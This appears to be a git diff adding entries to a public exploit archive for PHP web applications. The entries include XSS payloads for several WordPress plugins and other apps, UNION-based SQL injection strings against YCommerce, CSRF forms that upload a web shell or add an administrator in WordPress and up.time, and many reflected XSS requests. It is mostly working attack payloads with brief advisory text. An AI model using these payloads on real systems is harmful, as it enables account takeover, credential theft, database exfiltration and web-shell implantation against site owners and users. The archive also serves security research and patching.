+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/category.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/author.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/attachment.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/archive.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/404.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/tag.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/single.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-page.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-footer.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/showcase.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/search.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/page.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/index.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/widgets.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/theme-options.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/image.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/functions.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/comments.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/category.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/author.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/archive.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/404.php
+http://www.example.com/learn/t/wordpress/wp-content/plugins/hello.php
+http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/widget.php
+http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/legacy.php
+http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/akismet.php
+http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/admin.php
+http://www.example.com/learn/t/wordpress/wp-admin/user/menu.php
+http://www.example.com/learn/t/wordpress/wp-admin/upgrade-functions.php
+http://www.example.com/learn/t/wordpress/wp-admin/options-head.php
+http://www.example.com/learn/t/wordpress/wp-admin/network/menu.php
+http://www.example.com/learn/t/wordpress/wp-admin/menu.php
+http://www.example.com/learn/t/wordpress/wp-admin/menu-header.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/user.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/upgrade.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/update.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/update-core.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/theme-install.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/template.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/schema.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin-install.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/nav-menu.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/ms.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/misc.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/menu.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/media.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/file.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/dashboard.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/continents-cities.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-users-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-themes-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-theme-install-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-terms-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-posts-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugins-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugin-install-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-users-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-themes-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-sites-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-media-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-links-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ssh2.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpsockets.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpext.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-direct.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-list-table.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php
+http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php
+http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php
+
diff --git a/platforms/php/webapps/37827.txt b/platforms/php/webapps/37827.txt
new file mode 100755
index 000000000..fd14901be
--- /dev/null
+++ b/platforms/php/webapps/37827.txt
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/55605/info
+
+Purity theme for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Purity 1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/index.php?m=top&s='><script>alert("Hacked_by_MADSEC")</script>
+
+The "ContactName" ,"email" ,"subject" ,"comments", variables are not
+properly sanitized before being used
+
+Exploit:
+
+POST /contact/ HTTP/1.0
+Content-Length: 82
+Accept: */*
+Accept-Language: en-US
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+Host: exploit-masters.com
+Content-Type: application/x-www-form-urlencoded
+Referer: http://www.example.com/wordpress/contact/
+
+contactName=>"'><script>alert("Hacked_by_MADSEC")</script>&email=&subject=&comments=&submitted=
diff --git a/platforms/php/webapps/37828.txt b/platforms/php/webapps/37828.txt
new file mode 100755
index 000000000..d12005f5b
--- /dev/null
+++ b/platforms/php/webapps/37828.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55619/info
+
+Poweradmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/37829.txt b/platforms/php/webapps/37829.txt
new file mode 100755
index 000000000..6d2896837
--- /dev/null
+++ b/platforms/php/webapps/37829.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55622/info
+
+The MF Gig Calendar plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+MF Gig Calendar 0.9.4.1 is vulnerable; other versions may also be affected. 
+
+GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1 
\ No newline at end of file
diff --git a/platforms/php/webapps/37833.txt b/platforms/php/webapps/37833.txt
new file mode 100755
index 000000000..6f5bd1b4a
--- /dev/null
+++ b/platforms/php/webapps/37833.txt
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/55653/info
+
+YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+Proof of Concept - YCommerce Reseller
+-------------------------------------
+GET Param "cPath" - [Number of columns may vary]
+/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
+/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
+/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
+
+GET Param "news_id" - [Number of columns may vary]
+/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
+
+
+Proof of Concept - YCommerce Pro
+--------------------------------
+GET Param "enterprise_id" - [Number of columns may vary]
+/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61
+
+GET Param "news_id" - [Number of columns may vary]
+/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
+
+
diff --git a/platforms/php/webapps/37835.html b/platforms/php/webapps/37835.html
new file mode 100755
index 000000000..491e7bd3f
--- /dev/null
+++ b/platforms/php/webapps/37835.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55660/info
+
+WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
+
+Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
+
+WordPress 3.4.2 is vulnerable; other versions may also be affected. 
+
+<body onload="javascript:document.forms[0].submit()"> <form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form"> <h1>How Many Girls You Have? xD))</h1> <!-- Idea for you: Iframe it --> <input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" /> <select id="rss-items-1" name="widget-rss[1][items]"> <option value='1' >1</option> <option value='2' >2</option> <option value='3' >3</option><option value='4' >4</option> <option value='5' >5</option> <option value='6' >6</option> <option value='7' >7</option> <option value='8' >8</option> <option value='9' >9</option> <option value='10' >10</option> <option value='11' >11</option> <option value='12' >12</option> <option value='13' >13</option> <option value='14' >14</option> <option value='15' >15</option> <option value='16' >16</option> <option value='17' >17</option> <option value='18' >18</option> <option value='19' >19</option> <option value='20' selected='selected'>20</option> </select> <input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/> <input type="hidden" name="widget_id" value="dashboard_incoming_links" /> </form> 
\ No newline at end of file
diff --git a/platforms/php/webapps/37836.txt b/platforms/php/webapps/37836.txt
new file mode 100755
index 000000000..2004bb9f3
--- /dev/null
+++ b/platforms/php/webapps/37836.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/55664/info
+
+The Token Manager plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Token Manager 1.0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/admin.php?page=tokenmanageredit&tid=<script>alert(document.cookie);</script>
+http://www.example.com/wp-admin/admin.php?page=tokenmanagertypeedit&tid=<script>alert(document.cookie);</script>
diff --git a/platforms/php/webapps/37837.html b/platforms/php/webapps/37837.html
new file mode 100755
index 000000000..61b88414a
--- /dev/null
+++ b/platforms/php/webapps/37837.html
@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/55666/info
+
+The Sexy Add Template plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
+
+Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
+
+Sexy Add Template 1.0 is vulnerable; other versions may also be affected. 
+
+#################################################################################
+ #
+ # [ Information Details ]
+ # - Wordpress Plugin Sexy Add Template:
+ # Attacker allow CSRF Upload Shell.
+ # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
+ #
+ # <html>
+ # <head>
+ # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+ # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
+ # </head>
+ # <body onload="document.form0.submit();">
+ # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
+ # <input type="hidden" name="newfile" value="yes" /> 
+ # <input type="hidden" type="text" value="shell.php" name="AM_filename">
+ # <textarea type="hidden" name="AM_file_content">
+ # [ Your Script Backdoor/Shell ]
+ # &lt;/textarea&gt;
+ # </form>
+ # </body>
+ # </html>
+ #
+ # - Access Shell:
+ # http://www.example.com/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!!
+ #
+ # +#################################################################################
diff --git a/platforms/php/webapps/37838.txt b/platforms/php/webapps/37838.txt
new file mode 100755
index 000000000..398c0ee0d
--- /dev/null
+++ b/platforms/php/webapps/37838.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55667/info
+
+Neturf eCommerce Shopping Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
diff --git a/platforms/php/webapps/37885.html b/platforms/php/webapps/37885.html
new file mode 100755
index 000000000..279b902b7
--- /dev/null
+++ b/platforms/php/webapps/37885.html
@@ -0,0 +1,72 @@
+<!--
+up.time 7.5.0 Superadmin Privilege Escalation Exploit
+
+
+Vendor: Idera Inc.
+Product web page: http://www.uptimesoftware.com
+Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
+
+Summary: The next-generation of IT monitoring software.
+
+Desc: up.time suffers from a privilege escalation issue.
+Normal user can elevate his/her privileges by sending
+a POST request seting the parameter 'userroleid' to 1.
+Attacker can exploit this issue using also cross-site
+request forgery attacks.
+
+Tested on: Jetty, PHP/5.4.34, MySQL
+           Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2015-5251
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php
+
+
+29.07.2015
+
+--
+-->
+
+<html>
+  <body>
+    <form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=4" method="POST">
+      <input type="hidden" name="operation" value="submit" />
+      <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
+      <input type="hidden" name="username" value="Testingus2" />
+      <input type="hidden" name="password" value="&#42;&#42;&#42;&#42;&#42;" />
+      <input type="hidden" name="passwordConfirm" value="&#42;&#42;&#42;&#42;&#42;" />
+      <input type="hidden" name="firstname" value="Test" />
+      <input type="hidden" name="lastname" value="Ingus" />
+      <input type="hidden" name="location" value="Neverland" />
+      <input type="hidden" name="emailaddress" value="test2&#64;test&#46;test" />
+      <input type="hidden" name="emailtimeperiodid" value="1" />
+      <input type="hidden" name="phonenumber" value="111111" />
+      <input type="hidden" name="phonenumbertimeperiodid" value="1" />
+      <input type="hidden" name="windowshost" value="test" />
+      <input type="hidden" name="windowsworkgroup" value="testgroup" />
+      <input type="hidden" name="windowspopuptimeperiodid" value="1" />
+      <input type="hidden" name="landingpage" value="MyPortal" />
+      <input type="hidden" name="isonvacation" value="0" />
+      <input type="hidden" name="receivealerts" value="on" />
+      <input type="hidden" name="receivealerts" value="1" />
+      <input type="hidden" name="alertoncritical" value="on" />
+      <input type="hidden" name="alertoncritical" value="1" />
+      <input type="hidden" name="alertonwarning" value="on" />
+      <input type="hidden" name="alertonwarning" value="1" />
+      <input type="hidden" name="alertonunknown" value="on" />
+      <input type="hidden" name="alertonunknown" value="1" />
+      <input type="hidden" name="alertonrecovery" value="on" />
+      <input type="hidden" name="alertonrecovery" value="1" />
+      <input type="hidden" name="activexgraphs" value="0" />
+      <input type="hidden" name="newuser" value="on" />
+      <input type="hidden" name="newuser" value="1" />
+      <input type="hidden" name="userroleid" value="1" />
+      <input type="hidden" name="usergroupid&#91;&#93;" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/php/webapps/37886.txt b/platforms/php/webapps/37886.txt
new file mode 100755
index 000000000..2f69dc159
--- /dev/null
+++ b/platforms/php/webapps/37886.txt
@@ -0,0 +1,113 @@
+
+up.time 7.5.0 XSS And CSRF Add Admin Exploit
+
+
+Vendor: Idera Inc.
+Product web page: http://www.uptimesoftware.com
+Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
+
+Summary: The next-generation of IT monitoring software.
+
+Desc: The application allows users to perform certain
+actions via HTTP requests without performing any validity
+checks to verify the requests. This can be exploited to
+perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site. Multiple
+cross-site scripting vulnerabilities were also discovered.
+The issue is triggered when input passed via the multiple
+parameters is not properly sanitized before being returned
+to the user. This can be exploited to execute arbitrary HTML
+and script code in a user's browser session in context of
+an affected site.
+
+Tested on: Jetty, PHP/5.4.34, MySQL
+           Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2015-5252
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php
+
+
+29.07.2015
+
+--
+
+
+CSRF Add Admin:
+---------------
+
+<html>
+  <body>
+    <form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=add&id=0" method="POST">
+      <input type="hidden" name="operation" value="submit" />
+      <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
+      <input type="hidden" name="username" value="Testingus4" />
+      <input type="hidden" name="password" value="123123" />
+      <input type="hidden" name="passwordConfirm" value="123123" />
+      <input type="hidden" name="firstname" value="Test" />
+      <input type="hidden" name="lastname" value="Ingus" />
+      <input type="hidden" name="location" value="Neverland" />
+      <input type="hidden" name="emailaddress" value="test4&#64;test&#46;test" />
+      <input type="hidden" name="emailtimeperiodid" value="1" />
+      <input type="hidden" name="phonenumber" value="111111" />
+      <input type="hidden" name="phonenumbertimeperiodid" value="1" />
+      <input type="hidden" name="windowshost" value="test" />
+      <input type="hidden" name="windowsworkgroup" value="testgroup" />
+      <input type="hidden" name="windowspopuptimeperiodid" value="1" />
+      <input type="hidden" name="landingpage" value="MyPortal" />
+      <input type="hidden" name="isonvacation" value="0" />
+      <input type="hidden" name="receivealerts" value="on" />
+      <input type="hidden" name="receivealerts" value="1" />
+      <input type="hidden" name="alertoncritical" value="on" />
+      <input type="hidden" name="alertoncritical" value="1" />
+      <input type="hidden" name="alertonwarning" value="on" />
+      <input type="hidden" name="alertonwarning" value="1" />
+      <input type="hidden" name="alertonunknown" value="on" />
+      <input type="hidden" name="alertonunknown" value="1" />
+      <input type="hidden" name="alertonrecovery" value="on" />
+      <input type="hidden" name="alertonrecovery" value="1" />
+      <input type="hidden" name="activexgraphs" value="0" />
+      <input type="hidden" name="newuser" value="on" />
+      <input type="hidden" name="newuser" value="1" />
+      <input type="hidden" name="userroleid" value="2" />
+      <input type="hidden" name="usergroupid&#91;&#93;" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Reflected XSS:
+--------------
+
+GET /main.php?section=UserContainer&subsection=edit&id=bc6ac%22%3E%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29;%3E&name=Testingus4 HTTP/1.1
+-
+GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1a416c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea233bd169b0 HTTP/1.1
+-
+GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=14f2e6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cfd43d432&entitygroupmembership%5B%5D=1 HTTP/1.1
+-
+GET /main.php?section=UserContainer&subsection=edit&id=bc6ac"><img%20src%3da%20onload%3dalert(1)>f2c23&name=Testingus4 HTTP/1.1
+-
+GET /main.php?page=Users&subPage=UserContainer&subsection=view&id=240689'%3balert(1)%2f%2f205 HTTP/1.1
+-
+GET /main.php?section=UserContainer&subsection=edit&id=6&name=Testingus4e8b7f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadfb7 HTTP/1.1
+-
+GET /main.php?section=UserContainer&subsection=edit7bef8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9095&id=6&name=Testingus4 HTTP/1.1
+-
+GET /main.php?section=UserGroup&subsection=add270d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c1acb1f950&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
+-
+GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28a3345"><img%20src%3da%20onload%3dalert(1)>2d6845d9556&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
+-
+GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3a00%3a006795f"><img%20src%3da%20onload%3dalert(1)>c92fbc98475&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
+-
+GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28c0570"><img%20src%3da%20onload%3dalert(1)>77b8cd697e9&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
+-
+GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3a59%3a592b983"><img%20src%3da%20onload%3dalert(1)>0d9cc3967ae&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
+-
+GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane26cca6"><img%20src%3da%20onload%3dalert(1)>84e475837bc&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
+-
+GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
diff --git a/platforms/php/webapps/37887.txt b/platforms/php/webapps/37887.txt
new file mode 100755
index 000000000..8e3ecac2e
--- /dev/null
+++ b/platforms/php/webapps/37887.txt
